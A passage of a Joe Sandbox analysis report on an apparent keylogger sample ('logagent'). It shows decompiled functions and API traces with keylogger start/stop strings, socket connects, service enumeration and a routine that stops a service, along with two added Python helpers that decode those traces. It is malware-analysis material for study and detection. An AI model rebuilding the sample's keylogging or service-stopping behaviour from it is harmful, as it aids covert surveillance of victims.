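Added example, not code from the sample or from the Joe Sandbox report: the arithmetic of E0041230A reproduced in Python so that the function's purpose is visible. The listing calls GetSystemTimes twice with Sleep(0x3e8) (1000 ms) between them, each call filling three FILETIMEs (idle, kernel, user), widens each FILETIME to 64 bits (E004123EE is assumed to be that conversion; the sbb/adc pairs are the 64-bit subtractions), multiplies by 0x64 and divides with __aulldiv. The result is a whole-number CPU-utilisation percentage over one second, busy*100/total, where total is kernel+user time and busy is total minus idle (kernel time as reported by GetSystemTimes includes idle time, which is why idle is subtracted). GetSystemTimes is resolved with GetProcAddress rather than imported; it is absent from the oldest Windows XP builds, which is the usual reason for loading it at run time. The sample values below are constructed; the listing divides unconditionally, the example guards the zero-interval case.

```python
"""
The CPU-load computation performed by E0041230A, reproduced in Python.

    total = (kernel2 - kernel1) + (user2 - user1)
    busy  = total - (idle2 - idle1)
    pct   = busy * 100 / total        # multiply by 0x64, then __aulldiv
"""
from typing import NamedTuple, Tuple

FileTime = Tuple[int, int]  # (dwLowDateTime, dwHighDateTime), 100 ns ticks


class SystemTimes(NamedTuple):
    """One GetSystemTimes() result, in the order the API fills its out-params."""
    idle: FileTime
    kernel: FileTime
    user: FileTime


def filetime_to_u64(ft: FileTime) -> int:
    """Join the two 32-bit halves of a FILETIME into one unsigned 64-bit value
    (assumed to be what E004123EE does in the listing)."""
    low, high = ft
    if not (0 <= low <= 0xFFFFFFFF and 0 <= high <= 0xFFFFFFFF):
        raise ValueError("FILETIME halves must be unsigned 32-bit")
    return (high << 32) | low


def u64_to_filetime(value: int) -> FileTime:
    """Inverse of filetime_to_u64; used to build the constructed samples."""
    if not 0 <= value < 1 << 64:
        raise ValueError("value does not fit a FILETIME")
    return (value & 0xFFFFFFFF, value >> 32)


def advance(sample: SystemTimes, idle: int, kernel: int, user: int) -> SystemTimes:
    """A later sample whose counters grew by the given number of 100 ns ticks
    (GetSystemTimes sums the counters over all logical CPUs)."""
    return SystemTimes(
        idle=u64_to_filetime(filetime_to_u64(sample.idle) + idle),
        kernel=u64_to_filetime(filetime_to_u64(sample.kernel) + kernel),
        user=u64_to_filetime(filetime_to_u64(sample.user) + user),
    )


def cpu_busy_percent(first: SystemTimes, second: SystemTimes) -> int:
    """Whole-number CPU busy percentage between two samples.

    The listing works in unsigned 64-bit arithmetic and divides without a
    check, so identical samples would fault and a negative busy value would
    wrap.  Here a zero interval yields 0 and busy is clamped at 0.
    """
    d_idle = filetime_to_u64(second.idle) - filetime_to_u64(first.idle)
    d_kernel = filetime_to_u64(second.kernel) - filetime_to_u64(first.kernel)
    d_user = filetime_to_u64(second.user) - filetime_to_u64(first.user)
    if min(d_idle, d_kernel, d_user) < 0:
        raise ValueError("second sample precedes the first")
    total = d_kernel + d_user
    if total == 0:
        return 0
    busy = max(total - d_idle, 0)
    return (busy * 100) // total  # truncating division, as __aulldiv does


# Constructed sample (not from the report): the idle counter crosses a
# 32-bit boundary between the readings so the high word matters.
SAMPLE_1 = SystemTimes(idle=(0xFFFFFF00, 0x5), kernel=(0x00000100, 0x7), user=(0x12345678, 0x0))
# One second later on a 4-CPU machine: 40,000,000 ticks, 20,000,000 of them idle.
SAMPLE_2 = advance(SAMPLE_1, idle=20_000_000, kernel=25_000_000, user=15_000_000)

if __name__ == "__main__":
    print(f"CPU busy: {cpu_busy_percent(SAMPLE_1, SAMPLE_2)}%")  # 50%
```

The string pair kernel32.dll / GetSystemTimes listed under String ID is the import-by-name residue of this routine; in a report it is a quick way to spot the same load-measurement code in other dumps.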

                                  C-Code - Quality: 25%
                                  			E10547762(void* __ecx, char _a4) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char* _t24;
                                  				char* _t25;
                                  				char* _t56;
                                  				void* _t57;
                                  
                                  				_t57 = __ecx;
                                  				GetLocalTime( &_v20);
                                  				_t24 =  &_v52;
                                  				L10555B05();
                                  				_t25 =  &_v36;
                                  				L10555AFF();
                                  				 *0x415338(_t25, _t25, _t24, _t24, 0x415adc,  &_a4, 0x415b00);
                                  				 *0x415348();
                                  				 *0x415348();
                                  				_t56 = malloc( *0x4152e4() + 0x64);
                                  				sprintf(_t56,  *0x415344(_v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff));
                                  				if( *((char*)(_t57 + 0x3c)) != 0) {
                                  					 *0x4152cc(_t56);
                                  				}
                                  				if( *((char*)(_t57 + 0x3d)) != 0) {
                                  					 *0x4152cc(_t56);
                                  					SetEvent( *(_t57 + 0x34));
                                  				}
                                  				 *0x4153e8(_t56);
                                  				return  *0x415348();
                                  			}

                                  APIs
                                  • GetLocalTime.KERNEL32(?,?,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,10546B55), ref: 10547770
                                  • malloc.MSVCRT ref: 105477C6
                                  • sprintf.MSVCRT ref: 105477F8
                                  • SetEvent.KERNEL32(?), ref: 10547824
                                  • ??3@YAXPAX@Z.MSVCRT ref: 1054782B
                                  Strings
                                  • Offline Keylogger Started, xrefs: 10547768
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??3@EventLocalTimemallocsprintf
                                  • String ID: Offline Keylogger Started
                                  • API String ID: 1702058749-4114347211
                                  • Opcode ID: 8fff95bf636d7516be670f0ed96f12c81efc0224525e2ebce3c59039dcac60e1
                                  • Instruction ID: 2ff0743a83b3cac70b7a43ba9b4ba605e1a3aff2a77ae6cc9b37863e2e813e5d
                                  • Opcode Fuzzy Hash: 8fff95bf636d7516be670f0ed96f12c81efc0224525e2ebce3c59039dcac60e1
                                  • Instruction Fuzzy Hash: 5D213376800518EBCB109BD4ED5DDFE7BBCFF98646B04442AF953D20A0EB78A644CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 24%
                                  			E00410E53(void* __eflags, char _a4) {
                                  				char _v20;
                                  				char _v36;
                                  				char _v52;
                                  				void* _t16;
                                  				char* _t18;
                                  				void* _t19;
                                  				void* _t36;
                                  
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                  				E00402038(0x41c130);
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				E0040209B(0x41c130,  &_a4);
                                  				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
                                  				_t18 =  &_v20;
                                  				L00414140();
                                  				L00414140();
                                  				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				E00402118(0x41c130, E00410F04);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t19;
                                  			}

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                    • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                    • Part of subcall function 00402118: CreateThread.KERNEL32 ref: 0040212D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                  • String ID:
                                  • API String ID: 2339118965-0
                                  • Opcode ID: fff12fb4abebd5b5a673ea32bd5a69ad6a431c578152a6b9ce6a84bceea9081e
                                  • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                  • Opcode Fuzzy Hash: fff12fb4abebd5b5a673ea32bd5a69ad6a431c578152a6b9ce6a84bceea9081e
                                  • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%
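
Added example, not part of the Joe Sandbox report or of the sample: a Python parser for the "APIs" lines of a function record, run over the lines listed for E00411760 earlier on this page and over the OpenSCManagerA subcall line (E004113C9) in the E00410E53 record above. It decodes the ADVAPI32 arguments into their winsvc.h names, which makes the two routines' purpose explicit: E00411760 opens a service and sends ControlService control code 1, SERVICE_CONTROL_STOP, and its decompiled listing passes 0x20 (SERVICE_STOP) to OpenServiceW, so it stops a named service; E004113C9 opens the SCM with 0x4, SC_MANAGER_ENUMERATE_SERVICE, consistent with building a service list. The access mask 0x20 given to OpenSCManagerW decodes to SC_MANAGER_MODIFY_BOOT_CONFIG rather than SC_MANAGER_CONNECT (CONNECT is implied by the call), and the decoder reports it as-is. Stack slots printed as "?" are unresolved in the trace (the OpenServiceW access mask is one such slot; the decompiled listing, not the trace, supplies 0x20), and the decoder says so rather than guessing. The constant tables come from winsvc.h; the input lines are copied from this page.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function record and decode the
ADVAPI32 service-control arguments into their winsvc.h names."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

Arg = Union[int, str, None]  # hex stack slot, string literal, or '?' (unresolved)

# Access rights and control codes from winsvc.h.
SC_MANAGER_ACCESS: Dict[int, str] = {
    0x01: "SC_MANAGER_CONNECT", 0x02: "SC_MANAGER_CREATE_SERVICE",
    0x04: "SC_MANAGER_ENUMERATE_SERVICE", 0x08: "SC_MANAGER_LOCK",
    0x10: "SC_MANAGER_QUERY_LOCK_STATUS", 0x20: "SC_MANAGER_MODIFY_BOOT_CONFIG",
}
SERVICE_ACCESS: Dict[int, str] = {
    0x01: "SERVICE_QUERY_CONFIG", 0x02: "SERVICE_CHANGE_CONFIG",
    0x04: "SERVICE_QUERY_STATUS", 0x08: "SERVICE_ENUMERATE_DEPENDENTS",
    0x10: "SERVICE_START", 0x20: "SERVICE_STOP", 0x40: "SERVICE_PAUSE_CONTINUE",
    0x80: "SERVICE_INTERROGATE", 0x100: "SERVICE_USER_DEFINED_CONTROL",
}
SERVICE_CONTROL: Dict[int, str] = {
    1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE", 3: "SERVICE_CONTROL_CONTINUE",
    4: "SERVICE_CONTROL_INTERROGATE", 5: "SERVICE_CONTROL_SHUTDOWN",
}

# "• API.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function XXXX:"; the argument list may be absent.
_LINE = re.compile(
    r"^\s*[•*]?\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                 # call site inside the sample
    subcall: Optional[int]   # set when the line was reported for a callee


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:          # headings, blanks, anything that is not an API line
            continue
        raw, sub = m.group("args"), m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"),
                             [_parse_arg(t) for t in raw.split(",")] if raw else [],
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def describe_mask(mask: int, table: Dict[int, str]) -> List[str]:
    """Split an access mask into named bits; bits not in the table stay hex."""
    names = [name for bit, name in sorted(table.items()) if mask & bit]
    rest = mask & ~sum(table)
    if rest:
        names.append(hex(rest))
    return names or ["0"]


def _access(c: ApiCall, slot: int, table: Dict[int, str]) -> str:
    # Read only the positional slot the API really takes: the trace prints a
    # fixed number of stack slots, so later values (the repeated 00411280 is
    # a return address) are not arguments.  '?' stays unresolved, not guessed.
    val = c.args[slot] if len(c.args) > slot else None
    desc = "|".join(describe_mask(val, table)) if isinstance(val, int) else "unresolved"
    return f"{c.api}@{c.ref:08X}: access={desc}"


def decode_service_calls(calls: List[ApiCall]) -> List[str]:
    out = []
    for c in calls:
        if c.module != "ADVAPI32":
            continue
        if c.api.startswith("OpenSCManager"):
            out.append(_access(c, 2, SC_MANAGER_ACCESS))
        elif c.api.startswith("OpenService"):
            out.append(_access(c, 2, SERVICE_ACCESS))
        elif c.api == "ControlService":
            ctl = c.args[1] if len(c.args) > 1 else None
            name = SERVICE_CONTROL.get(ctl, hex(ctl)) if isinstance(ctl, int) else "unresolved"
            out.append(f"{c.api}@{c.ref:08X}: control={name}")
    return out


def stops_a_service(calls: List[ApiCall]) -> bool:
    """True for the OpenSCManager -> OpenService -> ControlService(STOP) chain."""
    stage = 0
    for c in (c for c in calls if c.module == "ADVAPI32"):
        if stage == 0 and c.api.startswith("OpenSCManager"):
            stage = 1
        elif stage == 1 and c.api.startswith("OpenService"):
            stage = 2
        elif stage == 2 and c.api == "ControlService" and c.args[1:2] == [1]:
            return True
    return False


# Input copied from the E00411760 record on this page.
E00411760_APIS = """\
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
• ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
• OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
• ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
"""
# The subcall line from the E00410E53 record (service enumeration access).
E004113C9_LINE = "  • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9"

if __name__ == "__main__":
    calls = parse_api_lines(E00411760_APIS)
    print("\n".join(decode_service_calls(calls)), "\nstops a service:", stops_a_service(calls))
```

The parser deliberately skips lines that do not match the API-line shape, so a whole record (headings, "Strings", "Memory Dump Source") can be pasted in unchanged; the "Part of subcall function" prefix is kept as the subcall address so calls inherited from callees can be told apart from the function's own.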

                                  C-Code - Quality: 43%
                                  			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
                                  				char _v20;
                                  				void* _t15;
                                  				void* _t18;
                                  				signed int _t20;
                                  				void* _t25;
                                  				signed int _t28;
                                  				signed int _t29;
                                  				signed int _t36;
                                  				void* _t46;
                                  				signed int _t57;
                                  				void* _t58;
                                  
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				_t57 = __eax + 2;
                                  				_t15 = _t57 + _t57;
                                  				L00413E84();
                                  				_t25 = _t15;
                                  				_t28 = _t57;
                                  				_t46 = _t25;
                                  				_t29 = _t28 >> 2;
                                  				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
                                  				_t6 = _t57 - 2; // 0x0
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
                                  				_t58 = _t18;
                                  				_t36 = _t6 >> 2;
                                  				_t20 = memcpy(_t25, _t58, _t36 << 2);
                                  				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
                                  				L00413EBE();
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _a4;
                                  			}

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                  • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 391609400-0
                                  • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                  • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00413B0F() {
                                  				struct tagMSG _v32;
                                  				char _v292;
                                  				int _t15;
                                  
                                  				GetModuleFileNameA(0,  &_v292, 0x104);
                                  				 *0x41c204 = E00413BC8();
                                  				0x41c200->cbSize = 0x58;
                                  				 *0x41c208 = 1;
                                  				 *0x41c210 = 0x401;
                                  				 *0x41c214 = ExtractIconA(0,  &_v292, 0);
                                  				lstrcpynA(0x41c218,  *0x41b160, 0x40);
                                  				 *0x41c20c = 7;
                                  				Shell_NotifyIconA(0, 0x41c200);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push( &_v32);
                                  				while(1) {
                                  					_t15 = GetMessageA();
                                  					if(_t15 == 0) {
                                  						break;
                                  					}
                                  					TranslateMessage( &_v32);
                                  					DispatchMessageA( &_v32);
                                  					_push(0);
                                  					_push(0);
                                  					_push(0);
                                  					_push( &_v32);
                                  				}
                                  				return _t15;
                                  			}

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413B29
                                    • Part of subcall function 00413BC8: RegisterClassExA.USER32(00000030), ref: 00413C0E
                                    • Part of subcall function 00413BC8: CreateWindowExA.USER32 ref: 00413C29
                                    • Part of subcall function 00413BC8: GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00413B60
                                  • lstrcpynA.KERNEL32(0041C218,00000040), ref: 00413B78
                                  • Shell_NotifyIconA.SHELL32(00000000,0041C200), ref: 00413B8E
                                  • GetMessageA.USER32 ref: 00413BA1
                                  • TranslateMessage.USER32(?), ref: 00413BAB
                                  • DispatchMessageA.USER32 ref: 00413BB5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID:
                                  • API String ID: 1970332568-0
                                  • Opcode ID: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction ID: 0139c5569a5099b89989dc8841d294567b871d20cbef476d366633a748243c7d
                                  • Opcode Fuzzy Hash: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction Fuzzy Hash: DA1121B2841215BBD7109BD1EC4CEDB3BBCEB49351F008166B615D2051D7B89545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E10555557() {
                                  				char _v20;
                                  				struct _WNDCLASSEXA _v68;
                                  				struct HWND__* _t21;
                                  				signed int _t23;
                                  
                                  				_t23 = 0xb;
                                  				memset( &(_v68.style), 0, _t23 << 2);
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsw");
                                  				_v68.cbSize = 0x30;
                                  				asm("movsb");
                                  				_v68.lpszClassName =  &_v20;
                                  				_v68.style = 0;
                                  				_v68.lpfnWndProc = 0x413c3f;
                                  				_v68.cbClsExtra = 0;
                                  				_v68.cbWndExtra = 0;
                                  				_v68.lpszMenuName = 0;
                                  				if(RegisterClassExA( &_v68) == 0) {
                                  					L3:
                                  					return 0;
                                  				}
                                  				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                                  				if(_t21 == 0) {
                                  					GetLastError();
                                  					goto L3;
                                  				}
                                  				return _t21;
                                  			}

                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 1055559D
                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 105555B8
                                  • GetLastError.KERNEL32(?,00000000), ref: 105555C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$?<A$MsgWindowClass
                                  • API String ID: 2877667751-23946667
                                  • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction ID: b835873859ba017693882fd432f0971052399b0358a068a740610e17758423ec
                                  • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction Fuzzy Hash: D3019AB1C11228AACB11DF91EC08ADFBFB9EF457A4B004026F410A6240D7B0560ACAE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
